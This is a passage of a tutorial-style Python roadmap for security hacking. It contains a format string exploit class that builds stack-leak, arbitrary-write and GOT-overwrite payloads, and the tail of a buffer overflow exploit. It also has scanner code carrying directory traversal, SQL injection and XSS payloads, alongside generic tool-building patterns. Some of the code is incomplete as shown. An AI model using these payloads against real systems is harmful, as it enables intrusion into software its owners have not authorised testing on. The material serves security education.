    # Step 3: Build and send exploit
    # payload = exploit.build_payload(offset=146, eip_address=0x625011af, shellcode=LINUX_SHELLCODE)
    # exploit.send_payload(payload)

2. Format String Exploitation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
#!/usr/bin/env python3
"""
Format String Vulnerability Exploitation
Demonstrates various format string attacks
"""

import struct
import socket

class FormatStringExploit:
    def __init__(self):
        self.target_function_address = None
        self.shellcode_address = None
        
    def leak_stack(self, offset_start=1, offset_end=10):
        """Generate format string to leak stack values"""
        leak_payload = ""
        for i in range(offset_start, offset_end + 1):
            leak_payload += f"%{i}$x."
        return leak_payload.encode()
    
    def write_address(self, target_addr, value, offset):
        """Write arbitrary value to arbitrary address"""
        # Convert addresses to bytes
        addr_bytes = struct.pack('<I', target_addr)
        
        # Calculate the value to write
        # Format: [ADDRESS][%Nc%n] where N is calculated value
        padding = value - 4  # Subtract 4 for the address itself
        
        if padding <= 0:
            padding = 1
        
        payload = addr_bytes + f"%{padding}c%{offset}$n".encode()
        return payload
    
    def overwrite_got_entry(self, got_address, shellcode_addr, offset):
        """Overwrite GOT entry to redirect execution"""
        # Split the shellcode address into two 16-bit writes for precision
        low_bytes = shellcode_addr & 0xFFFF
        high_bytes = (shellcode_addr >> 16) & 0xFFFF
        
        # Build payload with two address overwrites
        payload = b""
        payload += struct.pack('<I', got_address)      # Low bytes target
        payload += struct.pack('<I', got_address + 2)  # High bytes target
        
        # Calculate padding for first write
        if low_bytes > 8:
            padding1 = low_bytes - 8
        else:
            padding1 = low_bytes + 0x10000 - 8
            
        # Calculate padding for second write
        if high_bytes > low_bytes:
            padding2 = high_bytes - low_bytes
        else:
            padding2 = high_bytes + 0x10000 - low_bytes
        
        payload += f"%{padding1}c%{offset}$hn".encode()
        payload += f"%{padding2}c%{offset+1}$hn".encode()
        
        return payload
    
    def demonstrate_attacks(self):
        """Demonstrate common format string attacks"""
        print("[+] Format String Exploitation Examples")
        print("-" * 50)
        
        # 1. Stack leak
        leak_payload = self.leak_stack(1, 20)
        print(f"Stack Leak Payload: {leak_payload}")
        
        # 2. Write to arbitrary address
        write_payload = self.write_address(0x08049000, 0x41414141, 4)
        print(f"Arbitrary Write Payload: {write_payload}")
        
        # 3. GOT overwrite
        got_payload = self.overwrite_got_entry(0x0804A010, 0x08048500, 4)
        print(f"GOT Overwrite Payload: {got_payload}")

if __name__ == "__main__":
    exploit = FormatStringExploit()
    exploit.demonstrate_attacks()

Phase 11 — Advanced Automation & Frameworks

1. Custom Vulnerability Assessment Framework

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
#!/usr/bin/env python3
"""
Comprehensive Vulnerability Assessment Framework
Modular design for extensible security testing
"""

import json
import threading
import argparse
from datetime import datetime
from abc import ABC, abstractmethod

class VulnerabilityScanner(ABC):
    """Abstract base class for vulnerability scanners"""
    
    @abstractmethod
    def scan(self, target):
        pass
    
    @abstractmethod
    def get_name(self):
        pass

class NetworkScanner(VulnerabilityScanner):
    """Network-based vulnerability scanner"""
    
    def get_name(self):
        return "Network Scanner"
    
    def scan(self, target):
        """Scan for network vulnerabilities"""
        vulnerabilities = []
        
        # Port scan
        open_ports = self.port_scan(target)
        
        for port_info in open_ports:
            port = port_info['port']
            banner = port_info.get('banner', '')
            
            # Check for known vulnerabilities
            if port == 22 and 'OpenSSH_7.4' in banner:
                vulnerabilities.append({
                    'type': 'SSH_VERSION_VULN',
                    'severity': 'Medium',
                    'port': port,
                    'description': 'Potentially vulnerable SSH version',
                    'cve': 'CVE-2018-15473'
                })
            
            elif port == 21 and 'vsftpd 2.3.4' in banner:
                vulnerabilities.append({
                    'type': 'FTP_BACKDOOR',
                    'severity': 'Critical',
                    'port': port,
                    'description': 'vsftpd 2.3.4 backdoor vulnerability',
                    'cve': 'CVE-2011-2523'
                })
        
        return vulnerabilities
    
    def port_scan(self, target):
        """Quick port scan implementation"""
        # Reuse our previous PortScanner class
        scanner = PortScanner(target, threads=50)
        return scanner.scan_range(1, 1000)

class WebScanner(VulnerabilityScanner):
    """Web application vulnerability scanner"""
    
    def get_name(self):
        return "Web Application Scanner"
    
    def scan(self, target):
        """Scan for web vulnerabilities"""
        vulnerabilities = []
        
        # URL validation
        if not target.startswith('http'):
            target = f"http://{target}"
        
        # Directory traversal test
        traversal_vulns = self.test_directory_traversal(target)
        vulnerabilities.extend(traversal_vulns)
        
        # SQL injection test
        sqli_vulns = self.test_sql_injection(target)
        vulnerabilities.extend(sqli_vulns)
        
        # XSS test
        xss_vulns = self.test_xss(target)
        vulnerabilities.extend(xss_vulns)
        
        return vulnerabilities
    
    def test_directory_traversal(self, target):
        """Test for directory traversal vulnerabilities"""
        vulnerabilities = []
        payloads = [
            '../../../etc/passwd',
            '..\\..\\..\\windows\\system32\\drivers\\etc\\hosts',
            '....//....//....//etc/passwd'
        ]
        
        for payload in payloads:
            test_url = f"{target}/?file={payload}"
            try:
                response = requests.get(test_url, timeout=5)
                if 'root:' in response.text or 'localhost' in response.text:
                    vulnerabilities.append({
                        'type': 'DIRECTORY_TRAVERSAL',
                        'severity': 'High',
                        'url': test_url,
                        'description': 'Directory traversal vulnerability detected',
                        'payload': payload
                    })
            except:
                continue
        
        return vulnerabilities
    
    def test_sql_injection(self, target):
        """Test for SQL injection vulnerabilities"""
        vulnerabilities = []
        payloads = [
            "' OR '1'='1",
            "1' UNION SELECT version()--",
            "1'; WAITFOR DELAY '0:0:5'--"
        ]
        
        # This would need form discovery first
        # Simplified implementation
        return vulnerabilities
    
    def test_xss(self, target):
        """Test for XSS vulnerabilities"""
        vulnerabilities = []
        payload = "<script>alert('XSS')</script>"
        
        # Test common parameters
        params = ['q', 'search', 'query', 'name']
        
        for param in params:
            test_url = f"{target}/?{param}={payload}"
            try:
                response = requests.get(test_url, timeout=5)
                if payload in response.text:
                    vulnerabilities.append({
                        'type': 'XSS',
                        'severity': 'Medium',
                        'url': test_url,
                        'description': 'Reflected XSS vulnerability',
                        'parameter': param
                    })
            except:
                continue
        
        return vulnerabilities

class VulnerabilityAssessment:
    """Main vulnerability assessment framework"""
    
    def __init__(self):
        self.scanners = [
            NetworkScanner(),
            WebScanner()
        ]
        self.results = {
            'target': '',
            'scan_time': '',
            'vulnerabilities': [],
            'summary': {}
        }
    
    def run_assessment(self, target):
        """Run complete vulnerability assessment"""
        print(f"[+] Starting vulnerability assessment on {target}")
        self.results['target'] = target
        self.results['scan_time'] = datetime.now().isoformat()
        
        all_vulnerabilities = []
        
        for scanner in self.scanners:
            print(f"[+] Running {scanner.get_name()}")
            try:
                vulns = scanner.scan(target)
                all_vulnerabilities.extend(vulns)
                print(f"    Found {len(vulns)} vulnerabilities")
            except Exception as e:
                print(f"    Error in {scanner.get_name()}: {e}")
        
        self.results['vulnerabilities'] = all_vulnerabilities
        self.generate_summary()
        
        return self.results
    
    def generate_summary(self):
        """Generate vulnerability summary"""
        total = len(self.results['vulnerabilities'])
        severity_count = {'Critical': 0, 'High': 0, 'Medium': 0, 'Low': 0}
        vuln_types = {}
        
        for vuln in self.results['vulnerabilities']:
            severity = vuln.get('severity', 'Unknown')
            if severity in severity_count:
                severity_count[severity] += 1
            
            vuln_type = vuln.get('type', 'Unknown')
            vuln_types[vuln_type] = vuln_types.get(vuln_type, 0) + 1
        
        self.results['summary'] = {
            'total_vulnerabilities': total,
            'severity_breakdown': severity_count,
            'vulnerability_types': vuln_types
        }
    
    def generate_report(self, format='json'):
        """Generate assessment report"""
        if format == 'json':
            return json.dumps(self.results, indent=2)
        
        elif format == 'text':
            report = f"Vulnerability Assessment Report\n"
            report += f"{'='*50}\n"
            report += f"Target: {self.results['target']}\n"
            report += f"Scan Time: {self.results['scan_time']}\n"
            report += f"Total Vulnerabilities: {self.results['summary']['total_vulnerabilities']}\n\n"
            
            report += "Severity Breakdown:\n"
            for severity, count in self.results['summary']['severity_breakdown'].items():
                if count > 0:
                    report += f"  {severity}: {count}\n"
            
            report += f"\nDetailed Findings:\n"
            report += f"{'-'*30}\n"
            
            for vuln in self.results['vulnerabilities']:
                report += f"[{vuln.get('severity', 'Unknown')}] {vuln.get('type', 'Unknown')}\n"
                report += f"  Description: {vuln.get('description', 'N/A')}\n"
                if 'cve' in vuln:
                    report += f"  CVE: {vuln['cve']}\n"
                report += f"  Details: {vuln}\n\n"
            
            return report
        
        else:
            raise ValueError("Unsupported format. Use 'json' or 'text'")
    
    def save_report(self, filename, format='json'):
        """Save report to file"""
        report = self.generate_report(format)
        
        with open(filename, 'w') as f:
            f.write(report)
        
        print(f"[+] Report saved to {filename}")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Vulnerability Assessment Framework")
    parser.add_argument("target", help="Target to scan (IP or domain)")
    parser.add_argument("-o", "--output", help="Output file", default="vuln_report.json")
    parser.add_argument("-f", "--format", choices=['json', 'text'], default='json', help="Report format")
    
    args = parser.parse_args()
    
    assessment = VulnerabilityAssessment()
    results = assessment.run_assessment(args.target)
    assessment.save_report(args.output, args.format)
    
    print(f"\n[+] Assessment complete!")
    print(f"[+] Found {results['summary']['total_vulnerabilities']} vulnerabilities")
    print(f"[+] Report saved to {args.output}")

Phase 12 — Daily Practice & Mindset

The Hacker’s Python Workout

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
#!/usr/bin/env python3
"""
Daily Python Challenges for Hackers
Build one skill every day
"""

import random
import string
import hashlib
import base64

class DailyChallenge:
    def __init__(self):
        self.challenges = [
            self.network_challenge,
            self.crypto_challenge,
            self.web_challenge,
            self.reverse_challenge,
            self.forensics_challenge
        ]
    
    def get_random_challenge(self):
        """Get a random daily challenge"""
        return random.choice(self.challenges)()
    
    def network_challenge(self):
        """Network-focused challenge"""
        challenges = [
            "Write a script to detect hosts with SSH keys in authorized_keys",
            "Create a TCP packet sniffer that detects SYN floods",
            "Build a DNS zone transfer checker",
            "Implement a simple HTTP proxy that logs all requests",
            "Write a script to detect ARP spoofing attacks"
        ]
        return random.choice(challenges)
    
    def crypto_challenge(self):
        """Cryptography challenge"""
        challenges = [
            "Implement a Caesar cipher cracker using frequency analysis",
            "Write a script to detect weak passwords using entropy calculation",
            "Create a hash collision detector for MD5",
            "Build a simple steganography tool for images",
            "Implement RSA key generation and signature verification"
        ]
        return random.choice(challenges)
    
    def web_challenge(self):
        """Web security challenge"""
        challenges = [
            "Build a SQL injection payload generator",
            "Create a web crawler that detects admin panels",
            "Write a script to bypass simple WAF filters",
            "Implement a cookie hijacking simulator",
            "Build a CSRF token analyzer"
        ]
        return random.choice(challenges)
    
    def reverse_challenge(self):
        """Reverse engineering challenge"""
        challenges = [
            "Write a simple PE file parser",
            "Create a string extractor for binary files",
            "Build a basic disassembler for x86 instructions",
            "Implement a hex dump analyzer",
            "Write a script to detect packed executables"
        ]
        return random.choice(challenges)
    
    def forensics_challenge(self):
        """Digital forensics challenge"""
        challenges = [
            "Build a deleted file recovery simulator",
            "Create a network packet timeline analyzer",
            "Write a script to extract metadata from images",
            "Implement a log correlation tool",
            "Build a memory dump string searcher"
        ]
        return random.choice(challenges)

# Example implementation of one challenge
class CaesarCipherCracker:
    """Example solution for crypto challenge"""
    
    def __init__(self):
        # English letter frequency
        self.freq_english = {
            'a': 8.12, 'b': 1.49, 'c': 2.78, 'd': 4.25, 'e': 12.02,
            'f': 2.23, 'g': 2.02, 'h': 6.09, 'i': 6.97, 'j': 0.15,
            'k': 0.77, 'l': 4.03, 'm': 2.41, 'n': 6.75, 'o': 7.51,
            'p': 1.93, 'q': 0.10, 'r': 5.99, 's': 6.33, 't': 9.06,
            'u': 2.76, 'v': 0.98, 'w': 2.36, 'x': 0.15, 'y': 1.97,
            'z': 0.07
        }
    
    def caesar_decrypt(self, ciphertext, shift):
        """Decrypt Caesar cipher with given shift"""
        result = ""
        for char in ciphertext.lower():
            if char.isalpha():
                shifted = chr((ord(char) - ord('a') - shift) % 26 + ord('a'))
                result += shifted
            else:
                result += char
        return result
    
    def calculate_fitness(self, text):
        """Calculate fitness score based on English frequency"""
        text = text.lower()
        score = 0
        text_length = sum(1 for c in text if c.isalpha())
        
        if text_length == 0:
            return 0
        
        for char in text:
            if char in self.freq_english:
                score += self.freq_english[char]
        
        return score / text_length
    
    def crack_caesar(self, ciphertext):
        """Crack Caesar cipher using frequency analysis"""
        best_shift = 0
        best_score = 0
        best_plaintext = ""
        
        for shift in range(26):
            plaintext = self.caesar_decrypt(ciphertext, shift)
            score = self.calculate_fitness(plaintext)
            
            if score > best_score:
                best_score = score
                best_shift = shift
                best_plaintext = plaintext
        
        return {
            'shift': best_shift,
            'plaintext': best_plaintext,
            'confidence': best_score
        }

if __name__ == "__main__":
    # Daily challenge
    challenge_gen = DailyChallenge()
    today_challenge = challenge_gen.get_random_challenge()
    print(f"🎯 Today's Challenge: {today_challenge}")
    
    # Example: Test Caesar cipher cracker
    print("\n🔐 Example: Caesar Cipher Cracker")
    cracker = CaesarCipherCracker()
    encrypted = "wklv lv d vhfuhw phvvdjh"
    result = cracker.crack_caesar(encrypted)
    
    print(f"Encrypted: {encrypted}")
    print(f"Decrypted: {result['plaintext']}")
    print(f"Shift: {result['shift']}")
    print(f"Confidence: {result['confidence']:.2f}")

Essential Hacker Habits

Daily Python Rituals

1
2
3
4
5
6
7
8
# Morning warmup
python3 -c "import this"  # Read the Zen of Python

# Practice one-liners
python3 -c "print([x for x in range(256) if chr(x).isprintable()])"

# Read someone else's exploit code
curl -s https://api.github.com/search/repositories?q=python+exploit | python3 -m json.tool

Weekly Projects Checklist

  • Build a new reconnaissance tool
  • Solve 3 coding challenges on HackerRank/LeetCode
  • Read and understand one CVE exploit
  • Refactor an old script for better performance
  • Contribute to an open-source security tool

“Code every day. Even 30 minutes builds mastery over months.”


The Hacker’s Python Library

Must-Have Modules

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
# Network & HTTP
import socket, requests, urllib3, scapy
from concurrent.futures import ThreadPoolExecutor

# System & Process
import subprocess, os, sys, threading
import multiprocessing, signal, time

# Data & Parsing
import json, csv, xml.etree.ElementTree as ET
import re, base64, hashlib

# Crypto & Security
from Crypto.Cipher import AES, DES, RSA
from Crypto.Random import get_random_bytes

# Web & HTML
from bs4 import BeautifulSoup
import selenium, lxml

# Database
import sqlite3, pymongo

Quick Installation Script

1
2
3
4
5
6
7
8
9
#!/bin/bash
echo "🐍 Setting up Python Hacker Environment"

# Essential packages
pip3 install requests beautifulsoup4 scapy pycryptodome
pip3 install paramiko selenium colorama tqdm
pip3 install python-nmap impacket-py3

echo "✅ Python hacker environment ready!"

Final Words: Your Python Journey

"Python isn't just code — it's how hackers think. Master the language, master the craft."

The Path Forward

  1. Start Small, Think Big

    • Begin with simple scripts
    • Gradually add complexity
    • Always solve real problems
  2. Read Code Daily

    • Study exploit repositories
    • Analyze security tools
    • Learn from others’ mistakes
  3. Build Your Arsenal

    • One script per week minimum
    • Document everything
    • Share your knowledge
  4. Never Stop Learning

    • Python evolves, stay current
    • New attack vectors emerge daily
    • Adapt your tools accordingly

TL;DR — Python Hacker’s Roadmap

Phase 1: Foundations (Weeks 1-4)

  • Master basic syntax, data types, control flow
  • Understand functions, error handling, file I/O
  • Build simple port scanner and HTTP client
  • Practice with 20+ small scripts

Phase 2: Security Applications (Weeks 5-8)

  • Network programming with sockets
  • Web scraping and form interaction
  • Basic cryptography implementation
  • Build directory fuzzer and vulnerability scanner

Phase 3: Advanced Exploitation (Weeks 9-12)

  • Buffer overflow exploit development
  • Format string vulnerability exploitation
  • Reverse engineering helpers
  • Advanced payload generation

Phase 4: Framework Development (Weeks 13-16)

  • Modular security framework design
  • Multi-threaded scanning engines
  • Automated report generation
  • Integration with existing tools

Phase 5: Mastery & Innovation (Ongoing)

  • Contribute to open-source projects
  • Develop novel attack techniques
  • Build comprehensive toolsuites
  • Mentor other aspiring hackers

Your Daily Python Practice

Morning Routine (15 minutes)

1
2
3
4
5
6
7
8
# Read this every day
import this

# Practice one-liner
python3 -c "import socket; print([socket.gethostbyaddr(f'8.8.8.{i}')[0] for i in range(1,10) if True])"

# Quick network check
python3 -c "import requests; print(requests.get('http://httpbin.org/ip').json())"

Evening Challenge (30 minutes)

  • Implement one security concept in code
  • Read one exploit from ExploitDB
  • Refactor an old script for better performance
  • Write documentation for your tools

Essential Resources for Continuous Learning

📚 Must-Read Documentation

🔧 Practice Platforms

🎯 Project Ideas for Skill Building

Beginner Projects

  • Password strength checker
  • Hash cracking tool
  • Simple keylogger detector
  • Network device discoverer

Intermediate Projects

  • Web vulnerability scanner
  • Payload encoder/decoder
  • Log analysis framework
  • Reverse shell generator

Advanced Projects

  • Custom malware analysis sandbox
  • Automated penetration testing framework
  • Machine learning threat detector
  • Blockchain security auditor

The Hacker’s Python Mindset

Think Like a Problem Solver

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
def hacker_mindset(problem):
    """The hacker approach to any problem"""
    
    # 1. Understand the system
    system_analysis = analyze_target(problem)
    
    # 2. Find the weakest link
    vulnerabilities = discover_weaknesses(system_analysis)
    
    # 3. Craft precise tools
    exploits = build_targeted_tools(vulnerabilities)
    
    # 4. Test and iterate
    results = test_and_improve(exploits)
    
    # 5. Document and share
    knowledge = document_findings(results)
    
    return knowledge

def analyze_target(target):
    """Break down the problem into components"""
    return {
        'entry_points': find_entry_points(target),
        'trust_boundaries': map_trust_relationships(target),
        'assumptions': identify_assumptions(target)
    }

Code with Security in Mind

  • Validate all inputs — Never trust user data
  • Handle errors gracefully — Fail securely, not openly
  • Log everything — Information is your weapon
  • Think like an attacker — How would you break this?

Advanced Python Techniques for Hackers

1. Metaclasses for Dynamic Tool Generation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
class ExploitMeta(type):
    """Metaclass for automatic exploit registration"""
    
    def __new__(cls, name, bases, attrs):
        new_class = super().__new__(cls, name, bases, attrs)
        
        if hasattr(new_class, 'cve_id'):
            ExploitRegistry.register(new_class.cve_id, new_class)
        
        return new_class

class BaseExploit(metaclass=ExploitMeta):
    """Base class for all exploits"""
    
    def __init__(self, target):
        self.target = target
        self.payload = None
    
    def generate_payload(self):
        raise NotImplementedError
    
    def exploit(self):
        raise NotImplementedError

2. Decorators for Logging and Timing

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
import functools
import time
import logging

def log_attacks(func):
    """Log all attack attempts"""
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        logging.info(f"Starting {func.__name__} on {args[0] if args else 'unknown target'}")
        
        start_time = time.time()
        try:
            result = func(*args, **kwargs)
            elapsed = time.time() - start_time
            logging.info(f"{func.__name__} completed in {elapsed:.2f}s")
            return result
        except Exception as e:
            logging.error(f"{func.__name__} failed: {e}")
            raise
    
    return wrapper

@log_attacks
def sql_injection_test(url, payload):
    """SQL injection testing with automatic logging"""
    response = requests.get(f"{url}?id={payload}")
    return 'error' in response.text.lower()

3. Context Managers for Resource Safety

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from contextlib import contextmanager
import socket

@contextmanager
def tcp_connection(host, port, timeout=5):
    """Safe TCP connection context manager"""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    
    try:
        sock.connect((host, port))
        yield sock
    finally:
        sock.close()

# Usage
with tcp_connection('example.com', 80) as sock:
    sock.send(b'GET / HTTP/1.1\r\nHost: example.com\r\n\r\n')
    response = sock.recv(1024)
    print(response.decode())

Performance Optimization for Security Tools

1. Asynchronous Programming

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import asyncio
import aiohttp
import time

async def check_url(session, url):
    """Asynchronous URL checker"""
    try:
        async with session.get(url, timeout=5) as response:
            return {
                'url': url,
                'status': response.status,
                'size': len(await response.read())
            }
    except Exception as e:
        return {'url': url, 'error': str(e)}

async def mass_url_check(urls):
    """Check multiple URLs concurrently"""
    async with aiohttp.ClientSession() as session:
        tasks = [check_url(session, url) for url in urls]
        results = await asyncio.gather(*tasks)
        return results

# Example usage
urls = [f"http://example.com/{i}" for i in range(100)]
results = asyncio.run(mass_url_check(urls))

2. Memory-Efficient Data Processing

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
def process_large_wordlist(filename):
    """Process wordlist without loading everything into memory"""
    
    with open(filename, 'r') as f:
        for line_num, line in enumerate(f, 1):
            word = line.strip()
            
            if not word or word.startswith('#'):
                continue
            
            # Process each word immediately
            yield {
                'line': line_num,
                'word': word,
                'length': len(word),
                'entropy': calculate_entropy(word)
            }

# Usage - memory efficient
for word_info in process_large_wordlist('rockyou.txt'):
    if word_info['entropy'] > 3.0:
        print(f"Strong word: {word_info['word']}")

3. Caching for Performance

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from functools import lru_cache
import hashlib

@lru_cache(maxsize=1000)
def hash_password(password, salt):
    """Cached password hashing for repeated operations"""
    return hashlib.pbkdf2_hmac('sha256', 
                              password.encode(), 
                              salt.encode(), 
                              100000).hex()

@lru_cache(maxsize=500)
def resolve_hostname(hostname):
    """Cached DNS resolution"""
    try:
        return socket.gethostbyname(hostname)
    except socket.gaierror:
        return None

Building Production-Ready Security Tools

1. Configuration Management

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
import configparser
import os
from dataclasses import dataclass

@dataclass
class ScannerConfig:
    """Configuration for security scanner"""
    max_threads: int = 50
    timeout: int = 5
    user_agent: str = "Mozilla/5.0 (Security Scanner)"
    wordlist_path: str = "/usr/share/wordlists/common.txt"
    output_format: str = "json"
    verbose: bool = False

def load_config(config_file="scanner.conf"):
    """Load configuration from file"""
    config = configparser.ConfigParser()
    
    if os.path.exists(config_file):
        config.read(config_file)
        
        return ScannerConfig(
            max_threads=config.getint('scanner', 'max_threads', fallback=50),
            timeout=config.getint('scanner', 'timeout', fallback=5),
            user_agent=config.get('scanner', 'user_agent', fallback="Mozilla/5.0"),
            wordlist_path=config.get('scanner', 'wordlist_path', fallback="/usr/share/wordlists/common.txt"),
            output_format=config.get('scanner', 'output_format', fallback="json"),
            verbose=config.getboolean('scanner', 'verbose', fallback=False)
        )
    
    return ScannerConfig()  # Default configuration

2. Comprehensive Logging

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
import logging
import sys
from datetime import datetime

class SecurityLogger:
    """Centralized logging for security tools"""
    
    def __init__(self, name, log_file=None, verbose=False):
        self.logger = logging.getLogger(name)
        self.logger.setLevel(logging.DEBUG if verbose else logging.INFO)
        
        # Console handler
        console_handler = logging.StreamHandler(sys.stdout)
        console_formatter = logging.Formatter(
            '%(asctime)s [%(levelname)s] %(message)s',
            datefmt='%H:%M:%S'
        )
        console_handler.setFormatter(console_formatter)
        self.logger.addHandler(console_handler)
        
        # File handler
        if log_file:
            file_handler = logging.FileHandler(log_file)
            file_formatter = logging.Formatter(
                '%(asctime)s [%(levelname)s] %(name)s: %(message)s',
                datefmt='%Y-%m-%d %H:%M:%S'
            )
            file_handler.setFormatter(file_formatter)
            self.logger.addHandler(file_handler)
    
    def info(self, message):
        self.logger.info(message)
    
    def error(self, message):
        self.logger.error(message)
    
    def warning(self, message):
        self.logger.warning(message)
    
    def debug(self, message):
        self.logger.debug(message)
    
    def attack_attempt(self, target, attack_type, payload=None):
        """Log attack attempts specifically"""
        msg = f"ATTACK: {attack_type} on {target}"
        if payload:
            msg += f" with payload: {payload[:50]}..."
        self.logger.info(msg)
    
    def vulnerability_found(self, target, vuln_type, severity):
        """Log discovered vulnerabilities"""
        self.logger.warning(f"VULN: {severity} {vuln_type} found on {target}")

3. Error Handling and Recovery

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
import time
import random
from functools import wraps

def retry_on_failure(max_attempts=3, delay=1, backoff_factor=2):
    """Decorator for automatic retry with exponential backoff"""
    def decorator(func):
        @wraps(func)
        def wrapper(*args, **kwargs):
            attempt = 1
            current_delay = delay
            
            while attempt <= max_attempts:
                try:
                    return func(*args, **kwargs)
                except Exception as e:
                    if attempt == max_attempts:
                        raise e
                    
                    print(f"Attempt {attempt} failed: {e}")
                    print(f"Retrying in {current_delay} seconds...")
                    
                    time.sleep(current_delay + random.uniform(0, 1))
                    current_delay *= backoff_factor
                    attempt += 1
            
        return wrapper
    return decorator

@retry_on_failure(max_attempts=3, delay=2)
def unreliable_network_operation(target):
    """Network operation that might fail"""
    response = requests.get(target, timeout=5)
    if response.status_code != 200:
        raise Exception(f"HTTP {response.status_code}")
    return response.text

The Professional Hacker’s Workflow

Complete Tool Template

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
#!/usr/bin/env python3
"""
Professional Security Tool Template
Author: jusot99
Version: 1.0
"""

import argparse
import sys
import json
from datetime import datetime
import signal

class ProfessionalSecurityTool:
    """Template for professional security tools"""
    
    def __init__(self, config):
        self.config = config
        self.logger = SecurityLogger("SecurityTool", config.log_file, config.verbose)
        self.results = []
        self.interrupted = False
        
        # Handle Ctrl+C gracefully
        signal.signal(signal.SIGINT, self.signal_handler)
    
    def signal_handler(self, signum, frame):
        """Handle interruption gracefully"""
        self.logger.info("Interruption received, cleaning up...")
        self.interrupted = True
        self.cleanup()
        sys.exit(0)
    
    def cleanup(self):
        """Cleanup resources before exit"""
        if self.results:
            self.logger.info("Saving partial results...")
            self.save_results("partial_results.json")
    
    def run(self, targets):
        """Main execution method"""
        self.logger.info(f"Starting scan of {len(targets)} targets")
        
        for target in targets:
            if self.interrupted:
                break
                
            try:
                result = self.scan_target(target)
                self.results.append(result)
                self.logger.info(f"Completed scan of {target}")
            except Exception as e:
                self.logger.error(f"Failed to scan {target}: {e}")
        
        return self.results
    
    def scan_target(self, target):
        """Override this method in subclasses"""
        raise NotImplementedError("Subclasses must implement scan_target")
    
    def save_results(self, filename):
        """Save results to file"""
        output = {
            'timestamp': datetime.now().isoformat(),
            'tool_version': "1.0",
            'results': self.results
        }
        
        with open(filename, 'w') as f:
            json.dump(output, f, indent=2)
        
        self.logger.info(f"Results saved to {filename}")

def main():
    """Main entry point"""
    parser = argparse.ArgumentParser(description="Professional Security Tool")
    parser.add_argument("targets", nargs="+", help="Targets to scan")
    parser.add_argument("-c", "--config", help="Configuration file")
    parser.add_argument("-o", "--output", default="results.json", help="Output file")
    parser.add_argument("-v", "--verbose", action="store_true", help="Verbose output")
    parser.add_argument("--log-file", help="Log file path")
    
    args = parser.parse_args()
    
    # Load configuration
    config = load_config(args.config) if args.config else ScannerConfig()
    config.verbose = args.verbose
    config.log_file = args.log_file
    
    # Run the tool
    tool = ProfessionalSecurityTool(config)
    results = tool.run(args.targets)
    tool.save_results(args.output)
    
    print(f"\nScan complete! Processed {len(args.targets)} targets")
    print(f"Results saved to {args.output}")

if __name__ == "__main__":
    main()

Master These Python Concepts

Essential Skills Checklist

Core Language Features

  • List/Dict/Set comprehensions
  • Generators and iterators
  • Context managers
  • Decorators
  • Exception handling
  • Threading and multiprocessing
  • Regular expressions
  • File I/O operations

Security-Specific Skills

  • Socket programming
  • HTTP requests/responses
  • Binary data manipulation
  • Cryptographic operations
  • Process interaction
  • System monitoring
  • Network packet crafting
  • Web scraping and parsing

Advanced Techniques

